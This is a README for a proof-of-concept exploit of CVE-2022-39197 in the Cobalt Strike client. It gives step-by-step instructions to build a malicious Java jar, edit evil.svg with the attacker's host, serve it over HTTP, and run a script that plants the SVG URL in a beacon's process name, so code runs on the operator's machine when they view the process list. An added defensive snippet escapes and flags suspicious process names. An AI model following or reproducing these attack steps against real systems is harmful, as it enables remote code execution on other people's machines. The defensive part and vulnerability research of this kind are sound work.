# CVE-2022-39197-RCE
CVE-2022-39197 RCE POC
## First
This project was modified from [@its-arun](https://github.com/its-arun)'s project: https://github.com/its-arun/CVE-2022-39197

When I tested the script, I found that the frida script could not query the data in the normal order. The change here is to the way the frida script modifies the process name.

Thanks to Master [@Kai5174](https://github.com/Kai5174) for his contribution to the utilization method.
### Usage
- **Prepare Payload**
1. Edit the command executed by your payload in `EvilJar/src/main/java/Exploit.java`; as shipped, it only launches the calculator.
2. Build the jar using `mvn clean compile assembly:single`.
3. Move `EvilJar-1.0-jar-with-dependencies.jar` from `EvilJar/target/` to the `serve/` folder.
4. Edit `serve/evil.svg` and replace `[attacker]`.
5. Serve using `python3 -m http.server 8080`.
6. Generate beacon.exe with a C2 version less than or equal to 4.7.
7. You need to execute the Python script on a Windows host to go online; the countermeasure is carried out when the client accesses the process list and sees the beacon.exe process.
- **Execute Exploit**
```
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg
```
The payload is triggered as soon as the user scrolls through the Process List.
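A defender-side check for the condition this PoC depends on: a process name reported by a remote agent is attacker-controlled text and must not reach a UI that renders markup. This is an added example, not code from this project or from its-arun's; the allow-list pattern, the 64-character limit, the function names and the sample names are assumptions constructed for illustration.

```python
import re
from html import escape

# Assumption: a legitimate process name is a short, file-name-like token.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 ._()+-]{0,63}$")
URL_HINT = re.compile(r"(?i)\b(?:https?|ftp|file|jar):")
MAX_LEN = 64  # assumed display limit


def inspect_process_name(name: str) -> dict:
    """Classify one untrusted process name and build a display-safe form."""
    reasons = []
    if len(name) > MAX_LEN:
        reasons.append("too_long")
    if "<" in name or ">" in name:
        reasons.append("markup")
    if URL_HINT.search(name):
        reasons.append("url")
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):
        reasons.append("control_chars")
    if not reasons and not SAFE_NAME.match(name):
        reasons.append("unexpected_chars")
    # Replace control characters, truncate, then escape so that a
    # rich-text renderer shows the text literally instead of parsing it.
    printable = "".join(
        "?" if ord(c) < 0x20 or ord(c) == 0x7F else c for c in name
    )
    display = escape(printable[:MAX_LEN], quote=True)
    return {"name": name, "suspicious": bool(reasons),
            "reasons": reasons, "display": display}


def triage(process_names):
    """Return only the entries that should be logged and reviewed."""
    return [r for r in map(inspect_process_name, process_names) if r["suspicious"]]


# Constructed sample process list (not captured from a real host).
SAMPLE = [
    "svchost.exe",
    "System Idle Process",
    "<b>x</b> http://example.invalid/a.svg",
    "notepad.exe\x07",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE):
        print(hit["reasons"], hit["display"])
```

Rendering only the `display` value keeps hostile names visible to the analyst as literal text, and the `reasons` list gives a log field to alert on.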
### POC
**Windows**

**Mac**

### Reference
- [https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg](https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg) — There's a great in-depth analysis of this vulnerability
- [https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html](https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html)
- Modified from https://github.com/its-arun/CVE-2022-39197

```
[4.0K] /data/pocs/3d1b2d7c884fad5aae5b3c022ec375bc958e56c4
├── [1.7K] CVE-2022-39197_Yyy.py
├── [4.0K] EvilJarYyy
│   ├── [4.0K] META-INF
│   │   └── [  50] MANIFEST.MF
│   ├── [1.9K] pom.xml
│   └── [4.0K] src
│       └── [4.0K] main
│           └── [4.0K] java
│               └── [1.2K] Exploit.java
├── [4.0K] images
│   ├── [309K] 1.png
│   └── [266K] 2.jpg
├── [1.8K] README.md
├── [  11] requirements.txt
└── [4.0K] serve
    ├── [ 85K] EvilJar-1.0-jar-with-dependencies.jar
    └── [ 243] evil.svg

7 directories, 10 files
```